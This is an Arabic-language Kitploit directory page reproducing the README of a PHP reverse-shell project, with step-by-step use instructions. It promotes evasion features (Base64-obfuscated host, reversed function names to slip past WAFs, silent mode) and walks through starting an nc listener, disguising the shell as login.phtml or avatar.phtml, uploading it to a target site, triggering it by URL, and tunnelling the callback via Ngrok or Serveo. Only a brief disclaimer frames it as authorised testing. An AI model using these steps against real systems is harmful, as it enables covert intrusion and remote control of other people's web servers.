Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PHP-REVERSE-SHELL — هذا هو شل عكسي PHP قوي ومخفي مصمم للاختراق الأخلاقي واختبار الاختراق. يقوم بإنشاء اتصال موثوق وهادئ عائد إلى جهازك. | Kitploit
أدوات/GitLabGitLab/s_r_e_e_r_a_j/php-reverse-shell
توليد الحمولةالتهرب من IDS/IPSاستغلال تطبيقات الويبتجاوز WAFاختبار الاختراقالقيادة والسيطرةالتعلم والتعليمالفريق الأحمرأداة الوصول عن بعد
GitLabs_r_e_e_r_a_j/php-reverse-shell

PHP-REVERSE-SHELL

هذا هو شل عكسي PHP قوي ومخفي مصمم للاختراق الأخلاقي واختبار الاختراق. يقوم بإنشاء اتصال موثوق وهادئ عائد إلى جهازك.

1منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

PHP Reverse Shell (قوي ومتخفي)

هذه أداة ريفيرس شل بلغة PHP قوية ومتخفية، مصممة للاختراق الأخلاقي واختبار الاختراق. تنشئ اتصالاً موثوقاً وهادئاً عائداً إلى جهازك.

⚠️ إخلاء مسؤولية

تم تطوير هذه الأداة PHP reverse shell لأغراض تعليمية واختبار اختراق مصرح به فقط.
المطور ليس مسؤولاً عن أي استخدام خاطئ أو ضرر أو نشاط غير قانوني يتم باستخدام هذه الأداة reverse_shell.
استخدمها بمسؤولية وفقط على أنظمة تمتلكها أو لديك إذن صريح لاختبارها. الوصول غير المصرح به غير قانوني ويعاقب عليه القانون.

الميزات

  • IP وأمر الصدفة مشفران بـ Base64 للتمويه
  • أسماء الدوال معكوسة لتجاوز WAF والمرشحات الأمنية
  • وضع صامت — لا يتم عرض أي مخرجات لتجنب الكشف
  • إعادة الاتصال تلقائياً إذا انقطع الاتصال
  • يمكن تشغيله كخدمة خلفية (إذا كان الخادم يدعم ذلك)
  • يعمل على معظم الخوادم التي تدعم PHP
  • يدعم خدمات الأنفاق مثل Ngrok و Serveo
  • الرفع بامتداد .phtml لتجاوز بعض المرشحات

كيفية الاستخدام

1. ابدأ مستمعاً على جهازك

root@kitploit:~
nc -lvnp 4444

2. قم بتشفير عنوان IP أو اسم المضيف الخاص بك باستخدام Base64

استخدم هذا الأمر البسيط:

root@kitploit:~
echo "your_ip_or_hostname" | base64

مثال:

root@kitploit:~
echo "192.168.1.5" | base64

انسخ المخرجات واستبدل قيمة $ip_b64 في سكريبت PHP reverse shell.

3. قم بتحديث سكريبت PHP reverse shell الخاص بك:

قم بتغيير هذين السطرين بعنوان IP/اسم المضيف المشفر بـ Base64 والمنفذ:

root@kitploit:~
$ip_b64 = 'YOUR_BASE64_ENCODED_IP_OR_HOSTNAME';
$port = YOUR_LISTENER_PORT;

4. أعد تسمية الملف وقم برفعه

أعد تسمية الملف إلى اسم أقل شبهة، على سبيل المثال:

  • login.phtml
  • avatar.phtml
  • update.phtml

يساعد استخدام الامتداد .phtml في تشغيل الملف على بعض الخوادم التي تمنع .php.

قم برفع هذا الملف إلى موقع الهدف حيث يُسمح برفع الملفات.

5. قم بتشغيل الـ reverse shell

افتح الملف المرفوع في متصفح:

root@kitploit:~
http://target.com/uploads/login.phtml

بمجرد فتحه، سيحصل المستمع الخاص بك على اتصال reverse shell.

استخدام الأنفاق (عندما يكون عنوان IP الخاص بك غير عام)

إذا كنت تستخدم بيانات الجوال أو خلف راوتر (NAT)، فقد لا يكون عنوان IP الخاص بك عاماً. في هذه الحالة، لا يستطيع الـ reverse shell الوصول إلى جهازك مباشرة.

لإصلاح ذلك، استخدم أدوات أنفاق TCP مثل Ngrok أو Serveo.

Ngrok (موصى به)

قم بتثبيت Ngrok
شغّل هذا الأمر:

root@kitploit:~
ngrok tcp 4444

سيظهر شيء مثل:

root@kitploit:~
Forwarding tcp://4.tcp.ngrok.io:18900

قم بتحديث سكريبت PHP reverse shell الخاص بك:

root@kitploit:~
$ip_b64 = base64_encoded of 4.tcp.ngrok.io;
$port = 18900;

ابدأ المستمع الخاص بك:

root@kitploit:~
nc -lvnp 4444

Serveo

شغّل هذا الأمر:

root@kitploit:~
ssh -R 0:localhost:4444 serveo.net

سيقول شيئاً مثل:

root@kitploit:~
Forwarding TCP connections from serveo.net:46603

قم بتحديث سكريبت PHP reverse shell الخاص بك:

root@kitploit:~
$ip_b64 = base64_encoded of serveo.net;
$port = 46603;

ابدأ المستمع الخاص بك:

root@kitploit:~
nc -lvnp 4444

الترخيص

هذا المشروع مرخص بموجب رخصة GNU General Public License v3.0

تنزيل الأداة